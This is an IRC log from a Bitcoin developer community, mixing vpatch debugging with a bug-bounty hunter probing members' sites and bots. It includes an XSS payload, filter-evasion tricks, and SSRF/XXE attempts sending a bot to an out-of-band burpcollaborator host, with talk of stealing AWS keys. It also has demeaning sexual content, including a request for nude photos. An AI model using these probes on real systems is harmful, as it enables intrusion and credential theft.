deedbot: NoSatoshisHear voiced for 30 minutes.
ben_vulpes: it was right on time if you look at when he got voice
mod6: <+mircea_popescu> http://btcbase.org/log/2018-01-25#1776346 << i suspect his idea is "ideally, nothing". in any case foundation has not managed to keep up with the rest of the pie despite periodic prodding. << hmm. well whatever it is we do, I spend a lot of time doing it. happy to shut it down if it's not needed any more.
a111: Logged on 2018-01-25 19:15 trinque: what is the foundation's role then?
mircea_popescu: the issue is not "what is basic", but "you are too harsh" / "am not"
mircea_popescu: mod6 dun take it personal ; for one thing i'm hussling him not you.
mod6: nothing personal. i feel like the foundation is a good thing ; maintaining all of the things re: trb.
mod6: but if there is the sentiment that it's not needed, then we should have that talk.
mircea_popescu: jesus what a juggernaut this guy is. YO! that's not the sentiment.
mircea_popescu: throw darts at ben_vulpes end up tackled by mod6 ; what is this, like teamwork ?
mod6: I think it's good that we're able to adjust to anything if need be. Tis' all.
mod6: It's only as useful, as long as it's useful kinda thing.
mircea_popescu: i'm needling him about systems design matters because he's interested, and intelligent enough, and occasionally sparks from it.
mod6: <+asciilifeform> n00b wants to run trb. which trb will he run ? << n00b runs what is available at thebitcoin.foundation -- there are some recent vpatches that will become mainline once I can get all of the things vetted more closely.
mod6: Some of this is my fault, I've been trying to keep up here. Getting kinda swamped with a bunch of things at once. But! These are all good things. FFA, eucrypt, ada, vtron stuff, et. al.
mod6: Yeah, i agree, that 'releases' is kinda anti-V.
mod6: However, until n00bs get into the fold with what 'V' is, they kinda need just 1 stable thing to build with a 1-button-push. Which means folding things in slowly.
mod6: asciilifeform: by that i mean, 'you should choose your own adventure' -- each man pulls in the vpatches he desires.
mod6: you pull in the things you want, from the people you trust.
mod6: I'm so excited right now tbh.
mod6: I'd like to see the Republic continue to expand the number of trb nodes we have available this year. There are activities currently afoot that immensely support that. Getting FFA vetted and used as a base lib really will help get the ball rolling for any proposed trbi.
mod6: This year. Very excited & positive about that.
mircea_popescu: asciilifeform sorta like "Each user must read darwin theory for himself"
mircea_popescu: yes, they must, but not with a view to validate theory of evolution ; with a view to expunge head cockroaches
mod6: <+asciilifeform> mod6: i dun particularly disagree with any of this, but the pov that 'vetting ffa' is a 1time thing, that can be done and then 'is done', imho is mistake : each user must read it ~himself~. << I basically just mean for me & ben.
mod6: We have to understand every line.
mod6: The good news is, I started really digging into ada and your sneak-previews early last year.
mod6: Thankfully I put the time in.
mod6: I'm gonna get this vtron stuff out of the way, then dive in. I should be able to make it through the first 3 chapters pretty easily. I even wrote my own unit tests for those parts.
mod6: yes. I'm starting to love ada, at least, syntactically. The way you've used it, is very straight forward -- at least once one understands how array access / slices work.
mod6: I think so too, I took a peek at it. I'm actually excited that you put homework problems in there. And I'll do 'em for sure.
mod6: Honestly, I loved the homework for ffa_calc. That was awesome.
mircea_popescu: http://btcbase.org/log/2018-01-25#1776463 << hey, i knew a guy who didn't finance (1980s!) porn ventures because "not interested in the loose women". bought "blue chip" fucking revlon and bs instead. i'm sure there's even today ossified mind going "i'm not into tmsr because i'm not interested in terrorism". hurr durr, you never know what things are really about.
a111: Logged on 2018-01-25 21:28 NoSatoshisHear: I worked on digital coin in 2001, but tried to find a non-net solution, and finally just gave up. When you head the wrong way, you don't get there. Still feel stupid for not buying in at $5, but I had no interest in Silk Road.
mircea_popescu: asciilifeform it's not a novel concept to me -- coins that are only verified on exchange.
mircea_popescu: see, you can tell the guy is genuinely 60ish not just because of his specific pre-internet use of language ; but also because of his default mental models.
mircea_popescu: martian bank, if you're born in say 1960s, is exactly "secret magical pocket knife"
mod6: I'd like to make another positive mention here about TMSR~, if I may : one thing that really makes me smile is that all of us, no matter how busy, or whatever, are always willing to drop whatever it is to pitch in when the ship needs trimming.
mircea_popescu: i think i pointed out somewhere how boys that've never seen a cunt still get wet dreams, but with boobs instead. same thing here -- before networks were well understood people still thought about network-like problems. just... in roman numerals.
mod6: It's pretty fantastic all around. Very good things.
a111: Logged on 2015-08-02 21:00 mircea_popescu: you buy 6x6 inch panes of glass and crash them
mircea_popescu: which is like "i'm satisfied X", together with "hey, wait a minute, what if..."
a111: Logged on 2018-01-26 00:31 mircea_popescu: but you can see the appeal.
a111: Logged on 2018-01-25 19:15 trinque: what is the foundation's role then?
mod6: never hurts to ask a tough question.
trinque often does this to a person he thinks is qualified to give the argument
mod6: I appreciate all your hard work / blood / sweat / tears on your trb adventure with deedbot. Your contributions are and will make a difference. This is why the republic is on top. We don't imagine the change we want to see in the world, WE MAKE THE CHANGE WE WANT TO SEE IN THE WORLD.
mod6: This goes for all Lords and Ladies too. If that wasn't obv.
mircea_popescu: i'm satisfied it doesn't work and not happy with this.
mircea_popescu: as the man said, "motherfucker, why didn't i think of that!"
mircea_popescu: if you had that alien it'd be perhaps wiser to just let him figure out what to do himself ?
a111: Logged on 2018-01-26 00:33 mod6: I'd like to make another positive mention here about TMSR~, if I may : one thing that really makes me smile is that all of us, no matter how busy, or whatever, are always willing to drop whatever it is to pitch in when the ship needs trimming.
mod6: i gotta see this movie now
mod6: ok lemme see if i can do a bit of debugging on this mpwp and see if that really was the issue there.
mod6: ok here's what I've learned.
mod6: So if you manually extract the 'mpwp/blog/wp-includes/js/tinymce/plugins/wpgallery/img/gallery.png.svg' from the mp-wp_genesis.vpatch, and place it in a file, and attempt to base64 decode it, it fails to decode.
mod6: Why? Because of the 'false' at the end of this line: ++6/l4BiDfMrebzvzrfh2UMH8cTMAsbHbPRFuih0reDbX30AD+17CB1JhgefoRhOIbIr3k3CDKGT false
mod6: (note that in the genesis, there is an additional '+' at the front of the line)
mod6: anyway, removing: ' false' from that line will indeed, yield the correct hash, and allow for a proper base64 decoding.
mod6: 9e46f66499629dc2127e8ed8f0aebef467af1d18ceeb36326791ab201cd0bc0905236b3450c6c3944f6abea9c987fb0e28cc4cdadcec5c1834546173d816a893 gallery.png.svg.mod6_edit
mod6: Perhaps something with the vdiff is doing this? Or maybe there was something weird in the original encoding of this image? But that seems to be the solution, remove that ' false' and that should work.
mircea_popescu: basically her svging of binaries did some inadvertent fuzzing of the whole vdiff process
mod6: both vdiffs fail on this.
mod6: and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think.
douchebag: I managed to find two vulnerabilities in Yahoo last night, I highly suggest their bug bounty program for anyone who is interested in doing that sort of stuff.
douchebag: Well, I still have to wait until they patch them before they reward the bounty. They pay based on likelihood/impact, now a friend of mine reported a vulnerability less serious than the one I found and he was rewarded $2,000 total
douchebag: The other one I discovered, I would say probably somewhere between $200-$500
douchebag: However, even though I have to wait until they patch the bugs I found before they reward me, they did reward me $150 on triage and will be rewarding the rest at a later date
mod6: i suppose we should be looking for: (--- |\+\+\+ ) instead of (---|\+\+\+)
douchebag: A relatively well known bug bounty hunter I know has made $40k this month off of bug bounties, his goal is $50k for January
mircea_popescu: this is like re-reading old shoemoney drivel about google adsense successes. goals and whatnot.
douchebag: Haha, you do have to admit for the average person $40k in a little over 3 weeks is pretty damn good.
mircea_popescu: but you're not discussing an average person, you're discussing a selected person.
mircea_popescu: i know a girl that made $30 million with her ass ; and you must admit that for the average girl's ass this is indeed generous.
douchebag: Oh yes, that's very true. However, I do know quite a few people who have been very successful with it
mircea_popescu: i know quite a few people whose iq is over 150. the internet is good at collecting similar things. sadly -- this does little for the intelligence of the race in general.
douchebag: I suppose the point I'm trying to get across is that there is a pretty good community involved with bug bounties, I especially like the classic hacker attitude of most of the people in the sense that they're all working together to learn more
douchebag: And how most people are more than willing to share the information they acquire through blogs and whatnot
douchebag: mircea_popescu: Who runs bpvulpes.com?
trinque: surely you can sleuth that one out.
douchebag: ben_vulpes: I found a vulnerability in your site, how would you like me to disclose it to you?
douchebag: It's not a major issue and an easy fix, however it could potentially allow someone to create fake logs
trinque: guy's probably away for the night. why don't you drop him a gpggram on his paste site, link him to it here
douchebag: Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-)
trinque: might help you more to do that reading I was talking about, and get a v-tron set up.
douchebag: Mhmmm I already got it, thanks anyway though
douchebag: mircea_popescu: any sites you want me to take a look at really quick?
douchebag: To make my job a little bit easier, could you tell me a little bit about mp-wp and how it differs from Wordpress?
a111: Logged on 2018-01-23 07:11 mircea_popescu: actually, hanbot is about to genesis mp-wp, you're more than welcome to help down with the paring down effort of that, if you want. mostly php.
mircea_popescu: hanbot just published an unofficial genesis, so you can just fire up your v and press that
douchebag: Where can I find a copy of the source?
douchebag: mircea_popescu: I have discovered a vulnerability :-)
douchebag: How would you like me to disclose this?
douchebag: Is it alright if I link you to a PoC of the vulnerability?
douchebag: I was able to execute arbitrary Javascript on your site
douchebag: XSS can be used to steal cookies of logged in users which can then be used to jack their session.
douchebag: So there is never a session stored on the site?
mircea_popescu: not afaik ; moreover, does an alert box actually pop up for you ?
mircea_popescu: odd, neither archive bot nor this testbox firefox i have do it.
douchebag: You'll see arbitrary html was added to the page
mircea_popescu: this is hysterical, apparently it works in newer (3x, 4x firefox) but not in older (2x say).
douchebag: It might be, I'm not sure at the moment if this was added with mp-wp or if it was uploaded to trilema.com's webhost a later date
douchebag: Oh yeah, javascript is great isn't it?
mircea_popescu: anyway, i suppose "the message chosen was $" is just bad webcoding on my part.
douchebag: Don't feel bad, XSS is one of the most common vulnerabilities that exists on the majority of websites
mircea_popescu: but this browsershots set is a comedy goldmine! apparently a good third of the failful firefox browsers ALSO are getting an "uptades" blabla popup
douchebag: I wonder if any of the logs will pop an alert
douchebag: mircea_popescu: So the bots in this channel for instance the one that will add your GPG key from a url you provide
douchebag: That actually can hold quite the potential of a vulnerability
douchebag: If it's returning page responses in any way, it could be used to access internal network addresses
douchebag: What are the commands that have that sort of functionality?
deedbot: 6160E1CAC8A3C52966FD76998A736F0E2FB7B452 is already registered as mircea_popescu.
douchebag: Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data
douchebag: !!deed darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net
deedbot: Bad URL or network outage.
deedbot: Bad URL or network outage.
douchebag: !!deed gopher://darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net:80/_TEST
deedbot: Bad URL or network outage.
douchebag: That would have been cool if it worked
douchebag: Honestly, I bet a lot of boxes could be popped just from messing around with IRC bots lol
douchebag: IF I were able to find a bot that essentially returned the content of that URL and it was hosted on Amazon AWS
douchebag: I could grab the AWS Instances API keys lol
douchebag: It's the simple things like that which can do that most damage
deedbot: emmylark voiced for 30 minutes.
emmylark: *and madames. don't wanna discriminate
mircea_popescu: emmylark so write 4b57ff75 on your tits ; and get your slit in the shot as well.
mircea_popescu: tell me... how does it feel... to be all nude... like a hm... like a rolling stone.
emmylark: How did I do sir? Was it acceptable? I sent a second one just in case the first wasnt enough. I thought it might be nice to get to choose
mircea_popescu: now put your public key in a paste and say !!register url
mircea_popescu: emmylark it's very nice to get to choose ; i choose to keep the second for my private collection of smutty selfies.
deedbot: Provide a paste URL to the ascii-armored GPG public key or the full 40 character key fingerprint without spaces or dashes.
deedbot: 3BC472963B76AEE0448C19F414DEC3397D761EA4 registered as emmylark.
mircea_popescu: emmylark did you ever register your name with freenode ?
mircea_popescu: say /msg nickserv register your_password your_email_address ; use a good password and an email you actually can read, they'll send you a verification thing. this way someone else can't steal your name.
emmylark: I'm talking to you through the Freenode server in my IRC client. It made me register a name and email.
mircea_popescu: !!rate emmylark 1 Slutty pixie bearing my protection collar.
mircea_popescu: emmylark congrats on earning your first coupla bitcents!
emmylark: Wait are you serious? I did that for you sir.
deedbot: emmylark voiced for 30 minutes.
mircea_popescu: i rated you, so now the bot will allow you to voice yourself. say /query deedbot and then !!up ; it will give you a thing to decrypt, give the result back to it as !!v <string>
douchebag: I just learned about AngularJS XSS attacks
jhvh1: shinohai: Bitstamp BTCUSD last: 10531.07, vol: 14129.46495924 | Bitfinex BTCUSD last: 10527.0, vol: 49688.74405499 | Kraken BTCUSD last: 10538.0, vol: 6394.72947932 | Volume-weighted last average: 10528.8208745
mircea_popescu: but i thought they already had a perfect medium of exchange called the unified standard dosidoe!
a111: Logged on 2018-01-26 08:59 douchebag: Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data
a111: Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS ; and so does "GET /blog/blog-config.php~".
lobbes: http://btcbase.org/log/2018-01-26#1776736 << you really should do the homework trinque pointed you to, but if you are done with that and bored again, plox to look at logs.minigame.bz, lobbesblog.com and lobbesbot? I'm a meganoob so you may find something. I've no shame, so disclose whatever you can find here. I'll toss a handful of satoshis your way if you do (and a wot rating)
a111: Logged on 2018-01-26 07:09 douchebag: Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-)
lobbes: Most of the 'dynamic' bits of the www are php+sqlite3. lobbesbot is limnoria (fork of supybot, a common python bot api), also atop sqlite3
trinque appreciates the deedbot fuzzing. pretty damned sure all my inputs are quoted though.
mircea_popescu: in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his system, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ?
deedbot: mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions
a111: Logged on 2015-08-13 19:00 phf: mats: well, i actually meant the opposite. classes of attacks can be eliminated by not using c. i think that majority of the attacks come from leaky abstractions. there's no <string> in c, but there's a null terminated memory region. there's no <sql> in perl, but there's a character array with sql text in it. one of the solutions is to plug abstraction holes on a level of the language, in such a way that you can't not use improved abstractions
mircea_popescu: asciilifeform there's two fundamental items i can readily identify, maybe more. 1. i actually did plop an echo $_GET in there. is this just bad coding ? is it a legitimate assumption ? 2. he has a point, as long as it's on trilema.com, a script has powers OUTSIDE of its implicit scope, "steal cookies" whatever. is this ~actually~ bad systems design ?
mircea_popescu: obviously quoted link's right ; other than the attacks coming from nsa ("enemy" aka idiot with vested interest in idiocy), they ALL come from leaky abstractions. both points above qualify.
a111: Logged on 2016-08-01 19:48 asciilifeform: oh for fuckssake.
a111: Logged on 2018-01-16 17:08 mircea_popescu: (also, let it be pointed out for the benefit of the future noob : the use of xargs with shit from curl is dancing with the wolves. finest way to lose a box.)
mircea_popescu: well which the fuck is it, and don't tell me "why mp! perl=bash=php=crap", it's not the point.
mircea_popescu: if i'm responsible for the above why am i not responsible for sending emmylark nude on a harley to luser's house to tear out intel ME out of his chip ?
mircea_popescu: but the "you enabled js, you're dead" position is untenable -- i use js for the selection thing. and i fucking need it
mircea_popescu: without the ability to link INSIDE my output $value would decrease sensibly. not a little. a lot.
mircea_popescu: i honestly believe it's as big as the concept of link.
mircea_popescu: this triad : links, pingbacks, selection reference make up a whole NEW hypertext. just as far from the old as that was from text.
mircea_popescu: asciilifeform half of one, yes. needs the pingback to be full.
mircea_popescu: note the epic lulz of how the "vulnerability" doesn't even work until you get to ff version 30.
mircea_popescu: there's a pile of browser captures linked in there yest.
mircea_popescu: (because they didn't parse svg tags prior, not because "it doesn't work", he could have made it to work with plain script, so it's a separate issue, but quite germane)
mircea_popescu: imo a fabulous textbook example of how the imperial vulnerability cycle goes. 1. make a bad spec, a la SMGL ; 2. implement some portions of it only, because http://btcbase.org/log/2018-01-25#1776189 ; 3. discover the bad spec is vulnerable, issue "best practices" for people to "sanitize". obviously this will not be made by 1 if 2 wasn't, so... 4) implement slightly more of the spec, throw security in disarray.
a111: Logged on 2018-01-25 16:42 asciilifeform: i dun actually disagree with mircea_popescu : i never liked bigendianism . but it did come from a particular cost analysis , ftr.
mircea_popescu: this is EXACTLY how it goes, and perhaps why there has not yet existed such a thing as a fully implemented specification or a fully specified implementation in empire lands.
mircea_popescu: hey, i was looking for a pretext to get a test, so bbs.
a111: Logged on 2016-08-01 20:03 phf: mircea_popescu: a lot of xss detection "solutions" rely on grepping for known bad input, like "script" or whatever. and there are ways to sidestep that, like '<scr' + 'ipt>' or a='ipt>';'<scr'+a. in this case whoever is fucking with detection by using this truly wtf feature i've never heard of, <meta charset="a">b</meta> that apparently parses b according to charset a rules
mircea_popescu: asciilifeform slavegirl tasted, says my sperm count's fine (and delicious). so NYAH!
a111: Logged on 2018-01-25 16:29 mircea_popescu: wait wait, i might have a pill
mircea_popescu: asciilifeform i didn't expect it'd work mechanically ; but there it is now.
mircea_popescu: i suppose the workings of this insane nut posse must be quite disconcerting to the professional. "i told this guy he had an xss hole in some file and he proceeded to sign an unrelated snippet of javascript".
mircea_popescu: but, take heart douchebag : there's not that many people your age that can say "hey, i sent mp to meditation room" ; and they're overwhelmingly female to boot.
mircea_popescu: asciilifeform admire the recursive gift : his "reputation in the community" doth indeed grow. what now.
mircea_popescu: well... didn't the problem appear misstated originally ?
a111: Logged on 2018-01-23 19:52 phf: i can see the education angle, and how it fails these people, but what i'm surprised about is the lack of personal drive? it's some kind of learned helplessness
mircea_popescu: in entirely unrelated lulz : i recommend to the expert entomologist item #341 of the assembly of the state of new york, entered into record april 12, 1838 (a message from W L Marcy, the governor).
mircea_popescu: asciilifeform i got a hardbound copy. shall i have it transcribed ?
ben_vulpes: douchebag: how does this allow a user to create fake logs?
a111: Logged on 2018-01-26 05:06 mod6: and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think.
a111: Logged on 2016-12-11 20:15 mircea_popescu: +++7F0QaZAgBgF3/7448/fmnc/DnT29zJipI3ZCWnifqyfJH6/nRzUt7979al5JtwrACPLNjDb5Pc false <<< ahahaha epic!
jhvh1: asciilifeform: The operation succeeded.
mircea_popescu: i suspect this is what we are gazing upon in amazement : that slavegirl must ~love~, ie that there is no mechanical solution to the problem.
mircea_popescu: in vaguely related lulz : there existed a cult which had the girls prostitute themselves for membership. (apparently it was tried with boys too, but it didn't pay.) eventually they just listed them as proper whores with "escort agencies". apparently a total of >quarter million men were made to feel religious however briefly during a decade.
mircea_popescu: because usually cults are built around a paranoid not a narcisiac
mircea_popescu: wants to fuck them himself, and what he can't fuck he kills.
mod6: the warren jefferies thing?
mircea_popescu: i dunno that any of those has anything to do with my harem tbh.
mircea_popescu: well, no, i mean something like "just because it has cogs in it doesn't mean it's a clock, could be a car transmission"
ben_vulpes: douchebag: how does what you found get leveraged into 'fake irc logs'?
mircea_popescu: and yes ; but that doesn't make the luddite right in any meaningful sense
douchebag: Able to inject Javascript, such javascript could be used to create a link that leads to logs that appear real, however they're completely fake
douchebag: Basically, the javascript could be used to remove the logs that exist (on the client side mind you), and add in logs that are fake
ben_vulpes: douchebag: so someone sends someone else a link with ?q=<script="diddledepageforme">, and unsuspecting b copies, pastes, reads everything but the url bar?
douchebag: It could be URL encoded, so they wouldn't really be able to read anything
douchebag: So yeah, people who know what the typical url format is would likely know right away that something is up
ben_vulpes is reminded of the doctorow pulp, "human readable"
a111: Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ?
douchebag: url -> url w/ js added in vuln parameter
douchebag: i gotta run, be back in about 30 mins
a111: Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day
a111: Logged on 2018-01-26 08:44 douchebag: <script>alert`OHAI`</script>
BingoBoingo: <asciilifeform> http://btcbase.org/log/2018-01-26#1777052 << i'd like to make such a challenge. but turns out that we do not even yet have a usable formula for what exactly even is an exploit. << Dude finds way through pehbot commands to replace host machine BIOS with "Hypercard" binary that shipped with OS7
a111: Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day
BingoBoingo: asciilifeform: Burns down box leaves less to confirm by reading failROM
BingoBoingo: asciilifeform: You failed to spec that part. You spec'd pehbot
mircea_popescu: it's very solvable as stated, but not mechanically. "1. figure out v ; 2. press pehbot ; 3. say intelligent things about it." "intelligent according to whom ?" "intelligent according to me" "how am i supposed to cheat this ?!" "you aren't."
a111: Logged on 2018-01-26 18:02 asciilifeform: mircea_popescu for instance prolly knew that one could paste a js into his php thing. but had no particular reason to give a damn
mircea_popescu: it's ~certainly~ in the list of things they'd spew once put to the question.
a111: Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ?
BingoBoingo: In other exploits, tonight I will be sleeping in a different bed because axe time gas time has some for the chinches de cama!
BingoBoingo: Eh, not such a big deal. First weeks the bites itch and then your immune system stops caring and you cease to get quite the histamine reaction to the bites.
mircea_popescu: how's the cocksuckers BingoBoingo ? apparently moar bloodsuckers.
BingoBoingo: mircea_popescu: Starting to get more attention for them again as my confidence recovers from the past weekend
mircea_popescu has had the following unpleasant experience : was going to take whore tribe horseback riding ; called whorelist, "o sure, pick me up ?" ; called horse farms "nope, wounded/gone/booked/etc". HOW!!! could it be harder to get horses than whores!
BingoBoingo: Mebbe horses provide less useful error messages to the locals? Thusly there were many available horses until they hit the same fate the cars do.
mircea_popescu: the true horse killing was in 50s, when ceausescu decided to force agromecanization
a111: Logged on 2018-01-26 16:15 mircea_popescu: in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his system, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ?
a111: Logged on 2018-01-26 17:12 mircea_popescu: not if it works to deliver the results above ?
mircea_popescu: phf is this repackageable into a puritan argument against sluts ? if not, why not ?
phf: i don't know the puritan arguments against sluts
mircea_popescu: you may not be aware, but the ~original~ repression of faggotry has everything in common with the original repression of jews, masons, etc : it was perceived by the "normal" man that these "perverts" have it TOO EASY.
mircea_popescu: it's "unfair" (in the exact sense of childhood playground) and therefore "forbidden". because... obviously you can find a MALE partner to work with ; the question is to get one of the speaking cows to do it.
mircea_popescu: so men who fuck men have an "unwarranted" social advantage, and consequently off with their heads.
phf: wake me when there's a "too easy" on btcbase
mircea_popescu: and so : a homebreaker is a female that delivers on the "easy" part which "anyone could do" (sex) and not on the hard part -- and there's no quotes there because how about YOU try polishing an oaken table the size of a current usian garage each morning, plus rub the iron pots.
mircea_popescu: !~google he's here, he's here, he's here have no fear, stay by his side an' he'll take you for a ride...
phf: mircea_popescu: i'm perhaps failing to find a point at which your analogy connects with the situation. i read it as "don't know on things that seem trivial"
mircea_popescu: phf no, no, the structure of the argument, "X propagates via r-selection" is not delivering on what i expect is the intent ("of COURSE x is "bad" in the sense of illegitimate).
mircea_popescu: the problem is that illegitimacy crosses a definition boundary (it doesn't mean the same thing in boston wharf side and in african village) and so leaves us stranded.
phf: yes, totally unrelated, yeesh slow day.
douchebag: Alright, what do you guys suppose I do I've been trying to find vulns in Starbucks pretty much all night with very little success. Should I continue hitting this bug bounty, or switch over to Yahoo's program?
phf: but, the intent wasn't actually "of course x is bad", we've had conversation about that elsewhere, this was a pure cause/purpose "you're fat" situation: that's literally how security theater propagates!
a111: Logged on 2018-01-25 23:37 NoSatoshisHear: centralized system, so one server counts the ticks, it would simply be a demo of reddit "the button" style idiocy combined with gambling. Sounds viral, like the 1918 flu.
mircea_popescu: phf ah, so it was just stating the obvious for some reason ? i'm... aware that's how it propagates o.O
phf: well, i didn't know if you were aware, and i can always fall back to the usual log "but tis was for the reader!"
mircea_popescu: (the truth of the matter is that the power of human speech comes from parsing and collapsing very lengthy and complex trees ; one of the rules is "obvious branch is dead", which means you practically never assume one's stating the obvious, so you pick the alternative)
mircea_popescu: phf the actual trick i use to force a "no, go down obv branch" is by prepending a "you know" or whatever. but, sure.
phf: i've seen the machinery work many times, though for some reason it reminded me of the case where it misfired, in a famous bit by feynman where he was cracking safes at los alamos, security resolution and the unexpected punchline is "don't let feynman near your safes"
BingoBoingo: douchebag: Have you tried flipping a coin? Or failing that tire flipping a bit?
douchebag: Not really too much, I've held onto coin and made a bit here and there. Typically I end up selling it right away so that I can get my cash in hand and not have to worry about waiting for the price to fluctuate. I know I should have held onto it
trinque gives this "pls to mirror back to me that am doing smart things smartly" hours to live
douchebag: Considering I looked at one of my wallets and $50 transactions are now worth roughly $20,0000
BingoBoingo: douchebag: I mean in the physical sense. You know... the old fashioned kind of flip and coin. Or flip and tire.
douchebag: Not really, I know that by responsibly disclosing vulnerabilities to companies I am building a pretty awesome resume which will benefit me later in life
douchebag: Everyone else I know is working some shitty job, not getting a decent amount of experience, and they're just kind of stuck in the same place. Meanwhile, I'm just entertaining myself with the challenge of hacking these companies
trinque: douchebag: your "write-only" mode grows tiresome
shinohai snickers a bit @ 'responsible disclosure'
trinque: nobody is inviting you to "be in the republic in your own way"
douchebag: Eh, perhaps. It's mainly just a hobby of mine, and I'm constantly learning from it and it pays the bills for now.
douchebag: Well, I'm not the best programmer out there however I always make damn sure the code I do write is secure as it can be
douchebag: "V. You could learn how to program correctly, such as for instance by writing your own V implementation, or by standing up an irc bot, or by following the excellent manuals produced by the Lordship. Bear in mind that it is deemed unethical within the Republic to write code if you haven't actually learned how to write it first, and that orcs' claims to have taught you something often turn out
trinque: douchebag: skipped right over the reading *again* did you
douchebag: Well, I'm just trying to figure out where my skillset could be best put to use, I would be more than capable of writing a V implementation or setting up an IRC bot. I'm trying to leave it to you guys to tell me where my skillset could best be put to use
lobbes: douchebag: while you are intelligent, and may have succeeded in sending mp to meditation room, realize that continued existence in this forum is predicated on you doing something useful for the Republic. Understanding -what- is useful will require (as trinque has been patiently explaining) "moar ready, less talky".
shinohai: !!rate douchebag -1 *autistic screeching
a111: Logged on 2018-01-23 20:04 ben_vulpes: ours mostly
trinque: several folks told douchebag here to do various somethings
lobbes: douchebag, -as you read more- the "how can I best use my skillset" will become obvious to you
shinohai: !!v F446A115E51B6AB6665F943C47F5DBADD60D81F06A76C65156E43F4710A7B46C
deedbot: shinohai rated douchebag -1 << *autistic screeching
trinque ftr thinks it's nice to see someone that shows up and wants to do *anything* aside pull his dick
trinque: just, the dickpulling can now go.
shinohai: Could have used skills to hack CoinCheck, been 530M usd richer
shinohai: Beatings bring about character development!
douchebag: I would like to clarify with someone that I properly understand everything required to create a V implementation.
shinohai: No, not incurable, but simply needs to do time in the logs, etc. to cure the aforementioned head cockroaches.
trinque: asciilifeform: shinohai negrated him all by himself
trinque: I don't see where I condemned
ben_vulpes: douchebag: so demonstrate it, yeah? talk is cheap.
douchebag: I'll write something up and let one of you take a look at it when I'm finished.
douchebag: It'll most likely be it's own web application.
ben_vulpes: douchebag: surely you're not thinking of something that would eat a mess of patches and sigs and vomit forth a press, are you?
shinohai: I'm genuinely curious to see gpg operations performed in a web app.
ben_vulpes: douchebag: howabout you tell me what this "it's own web application" is going to do
mod6: before writing a vtron, maybe spend some time using one.
ben_vulpes: douchebag: mod6 has a point, consider pressing a trb and syncing it douchebag
trinque: we'll never know which is a nick reference and which isn't!
douchebag: That's probably a good idea before I start.
ben_vulpes: still curious in re what this hypothetical webapp would do
ben_vulpes: asciilifeform: let the kid speak for himself, eh?
douchebag: Well, the web application would just be for viewing purposes, the PGP operations will still be done via command line. I am quite comfortable writing web apps using Python's Flask web framework
trinque: I see guidance, not beating, no harm there
ben_vulpes: guidance and beatins can be hard to distinguish at twenty feet when kiddo's reaching for the stove
douchebag: I do not know what marching orders are at this time, I'm going to have to read more into it to better understand
shinohai: ben_vulpes link is most definitely required reading imho
ben_vulpes: douchebag: press a trb with non-"release" patches so's you understand usage, ideally sync the binary if you can afford the hardware. then, write your own v, test it, and bring it back for review.
douchebag: For sure, is there one you suggest me starting with?
douchebag: V implementation to use so that I understand how everything is working together
ben_vulpes: asciilifeform's elaborates the fundamentals, mod6 has polished his to handle a bunch of edge cases.
ben_vulpes: it is a matter of taste. would you rather read python or perl?
mod6: fwiw, if you're comfortable with py, and you're on a learning quest, then start with alf's
shinohai: Her "Faith adviser" no less! Must have counseled 'ol Bill too.
phf: "The currency of the far-right: why neo-Nazis love bitcoin (The Guardian)"
phf: "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..."
phf: wherein she blames far right for creating and feeding islamic extremism
a111: Logged on 2018-01-26 19:24 asciilifeform: douchebag: does it ever bother you that you sell a $10k info for $1k ?
a111: Logged on 2018-01-26 20:04 douchebag: I would like to clarify with someone that I properly understand everything required to create a V implementation.
a111: Logged on 2018-01-25 01:01 mircea_popescu: v is essentially found today as an enchanted castle surrounded by 5000 rakes upon which the prince is welcome to step, and once he stepped he can come to us and by the shape in his forehead we can describe the rake he stepped on.
a111: Logged on 2018-01-26 22:16 phf: "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..."
a111: Logged on 2014-02-07 15:23 mircea_popescu: "Remember : we know where YOU live."
mircea_popescu: better make sure there's replacement "representatives" "presidents" etcetera for the WHOLE list.
mircea_popescu: well... if you do this many shows eventually you're gonna have to rely on reruns!
a111: Logged on 2018-01-26 20:46 shinohai: http://archive.is/KoGnA <<< Not mentioned here, how Coincheck asked the NEM developers to roll back chain ala mETH to recover losses.
mircea_popescu: i have about $1 trillion in trimmed pubic hairs. they, unlike a "transgender", are actually female, being XX.
shinohai: There's actually a market for shaved pubic hair! lol
mircea_popescu: asciilifeform the more interesting point is that purely latino style "kidnappings" are moving into the us in complete defiance of "law enforcement".
mircea_popescu: i was talking re "contempo" period, post ww2 not of the fucking know-nothing movement.